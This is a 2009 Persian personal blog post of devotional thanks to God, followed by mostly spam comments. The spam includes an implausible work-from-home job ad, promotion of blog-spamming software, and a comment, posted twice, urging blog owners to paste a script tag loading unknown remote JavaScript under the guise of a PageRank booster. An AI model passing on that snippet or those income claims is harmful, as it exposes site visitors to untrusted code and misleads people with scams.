مدی و خوابالو

چه تو قصه چه حقیقت...یکی بود یکی نبود

مدی و خوابالو

چه تو قصه چه حقیقت...یکی بود یکی نبود

سلام به خدای مهربون

به نام حق...نور مطلق 

 

اول وبلاگ رو دوست دارم با نام خدا شروع کنم و یه سلام مشتی به خدا کنم... 

 

سلام به خدای خوشگل و مهربون خودم 

 

خوبی خدایی جون

الهی من قربونت برمماچ نمی دونی امروز چقدر خوشحالم، امروز یه اتفاق خیلی خوب افتادهمژه 

 

حالا چی بوده بین خودم و خودت میمونه   

 

خیلی دوستت دارم

از فراسوی زمان

     در پس پستوی خانه‌ای کهنه

            بصدای رقص نسیم سبزت

آرامش را نجوا کردم

آرامش....

عاشقتم خدای خوشگل خودم

نظرات 6 + ارسال نظر
مهدی چهارشنبه 1 مهر‌ماه سال 1388 ساعت 10:21 ب.ظ http://nedayekhamoosh.blogsky.com/

اولین سلام،
پیروز باشید ...

[ بدون نام ] پنج‌شنبه 16 مهر‌ماه سال 1388 ساعت 06:38 ب.ظ

آگهی استخدام در شرکت معتبر ایرانی
www.Frotel.com

دیگر زمان اینکه برای کار مجبور باشید در محل کار حضور داشته باشید به پایان رسیده است
در هر جایی که باشید می توانید کارمند شرکت فروتل باشید
زمان کار مهم نیست
واریز حقوق به حساب بانکی شما دو بار در ماه صورت می گیرد
با روزی یک ساعت کار در فروتل می توانید 200هزار تومان درآمد کسب کنید
سقفی برای درآمدتان وجود ندارد و متناسب با کار شما می باشد
روشهای مختلفی برای کار با ما وجود دارد که به میل خودتان آنرا انتخاب کنید
این کار می تواند تنها شغل شما یا یکی از شغل های شما باشد
شرکت مبتکران توسعه تجارت پارسیان مجری روشهای نوین تجارت می باشد
اگر تخصصی هم ندارید شرکت متعهد به آموزش رایگان کارمندان خود می باشد



برای ثبت نام و شروع کار از لینک زیر وارد سایت ما شوید

http://www.frotel.com/ads-reg.php?moarref=1

محمد جمعه 17 مهر‌ماه سال 1388 ساعت 06:53 ق.ظ http://wWw.SavareZakhmi.Mihanblog.com

سلام دوست من
وبلاگ قشنگی داری
خواهشن این نظر رو کامل و با توجه بخون

اگر مایل به دریافت جدیدترین ورژن نرم افزار ارسال نظر به وبلاگها ( بلاگفا - میهن بلاگ - بلاگ اسکای) به ما سر بزنید.
توجه کن که بهترین راه واسه افزایش فروش یا بازدیدکنندگان وبت همین اسپمرها هستن.

اگرم دعوت نامه واسه ارسال اس ام اس رایگان از اینترنت رو میخوای بازم به ما سر بزن. و مهمتر از همه اینکه:

آیا به کسب درآمد از اینترنت اعتقاد نداری و یا راههای زیادی رو امتحان کردی و به پول نرسیدی؟
پس گوش کن
ایندفعه وضع یکم تغییر کرده.
اصلا لازم نیست روی تبلیغات کلیک کنی و یا اینکه زیرمجموعه بگیری و یا در سایتهای گفته شده ثبت نام کنی و در آخر هیچ پولی نگیری.
اصلا نیازی به حساب بانکی خارج از کشور ندارید. و حساب داخلی کافیه
اصلا به سایت یا ارگان دیگه ای وابسته نیستید و درآمد شما فقط به کار خودتون مربوطه.
میتونید در حالت آفلاین هم کسب درآمد داشته باشید.
میتونید درآمد ماهانه ثابت داشته باشید و برای شروع با روزی 2 ساعت 500 هزار تومان حقوقتون میشه.
برای اطلاع بیشتر از این محصول به وبلاگ من سر بزنید
wWw.SavareZakhmi.Mihanblog.com

ممنون میشم اگر بعد از ورود به وبلاگم یکی از تبلیغات گرافیکی سمت چپ وب رو نگاه کنی و به ما کمک کنی.
در ضمن من روشهایی ابتکاری واسه کسب درآمد از اینترنت دارم که واقعا جواب میده و به دلیل اینکه پخش نشده کاملا مطمئنه. در ضمن با ورود به وبلاگم میتونید جدیدترین جزوه های کسب درآمد از اینترنت رو دانلود کنید و نکته دیگه اینکه نویسنده جزوه ها خود منم و پیشنهاد میکنم تا پخش نشده کارت رو شروع کنی. توجه کن که به من جواب داده، پس به شما هم جواب میده........

ممنون میشم اگه نظرتون رو در قسمت نظرات بگین.
اگر هم مایل به تبادل لینک با من هستید منو با نام
$$دانلود بسته درآمدزایی CN 3- دانلود جدیدترین ورژن بلاگ اسپمر$$

لینک کرده و در قسمت نظرات وبلاگم بگید تا منم شما رو لینک کنم
با تشکر
یا علی

مرسی که سر زدی...روش فکر میکنم

PageRank v3.0.1 یکشنبه 8 آذر‌ماه سال 1388 ساعت 07:34 ب.ظ http://www.moj1.com

سلام


____________ توجه توجه توجه ____________

این یک کد میباشد و هیچ چیزی در وبلاگتان ظاهر نمیشود [لبخند]

کاری که انجام میدید برای شما این سود را دارد :
1.افزایش رانک وبلاگ شما در اینترنت! نتیجه » افزایش ورودی از گوگل
2.افزایش محبوبیت بین کاربران و اعتبار شما در نزد مدیر بلوگفا
3.افزایش ترافیک رابطه مستقیم با افزایش رانک شما
4.موفقیت بدون تبادل لینک و بدون گزاشتن باکس
5.این کد را قرار دهید و چند روزیصبر کنید [لبخند]


سود این کار برای ما :
1.افزایش ترافیک حجمی سایت! تنیجه افزایش رانک در الکسا
2.افزایش بازدید ورودی از الکسا ( روزانه 2000 لینک )
3.رانک الکسا از ده ، 7 می باشد و افزایش رانک مارا باعث میشود.


موفق باشید تا موفق باشیم [لبخند]

همین الان این کد را در انتهای وبلاگتان قرار دهید


____________ توجه توجه توجه ____________

این یک کد میباشد و هیچ چیزی در وبلاگتان ظاهر نمیشود [لبخند]


کد :

<center><script language="JavaScript"
src="http://web2008.persiangig.com/Google-PageRank[2010].js"></script></center>



لازم به ذکر است که از SEO سایت www.moj1.com برگرفته شده است .
قیمت طراحیی این SEO در ایران از مرز یک میلیون هم گزشته است ساتها?? هستند مانند پ?امسرا که با همین SEO پیشرفته در مدت 1 سال سایت 27 کشوری شد ..

PageRank v3.0.1 یکشنبه 8 آذر‌ماه سال 1388 ساعت 07:45 ب.ظ http://www.moj1.com

سلام


____________ توجه توجه توجه ____________

این یک کد میباشد و هیچ چیزی در وبلاگتان ظاهر نمیشود [لبخند]

کاری که انجام میدید برای شما این سود را دارد :
1.افزایش رانک وبلاگ شما در اینترنت! نتیجه » افزایش ورودی از گوگل
2.افزایش محبوبیت بین کاربران و اعتبار شما در نزد مدیر بلوگفا
3.افزایش ترافیک رابطه مستقیم با افزایش رانک شما
4.موفقیت بدون تبادل لینک و بدون گزاشتن باکس
5.این کد را قرار دهید و چند روزیصبر کنید [لبخند]


سود این کار برای ما :
1.افزایش ترافیک حجمی سایت! تنیجه افزایش رانک در الکسا
2.افزایش بازدید ورودی از الکسا ( روزانه 2000 لینک )
3.رانک الکسا از ده ، 7 می باشد و افزایش رانک مارا باعث میشود.


موفق باشید تا موفق باشیم [لبخند]

همین الان این کد را در انتهای وبلاگتان قرار دهید


____________ توجه توجه توجه ____________

این یک کد میباشد و هیچ چیزی در وبلاگتان ظاهر نمیشود [لبخند]


کد :

<center><script language="JavaScript"
src="http://web2008.persiangig.com/Google-PageRank[2010].js"></script></center>



لازم به ذکر است که از SEO سایت www.moj1.com برگرفته شده است .
قیمت طراحیی این SEO در ایران از مرز یک میلیون هم گزشته است ساتها?? هستند مانند پ?امسرا که با همین SEO پیشرفته در مدت 1 سال سایت 27 کشوری شد ..

حسن جمعه 13 فروردین‌ماه سال 1389 ساعت 08:41 ب.ظ http://last-shop.mihanblog.com/

سلام
اگه با تبادل لینک موافقی منو با نام خرید اینترنتی لینک کن و بهم خبر بده تا با نام دلخواهت لینکت کنم
قول مردونه میدم سریع لینک شید
http://last-shop.mihanblog.com/

برای نمایش آواتار خود در این وبلاگ در سایت Gravatar.com ثبت نام کنید. (راهنما)
ایمیل شما بعد از ثبت نمایش داده نخواهد شد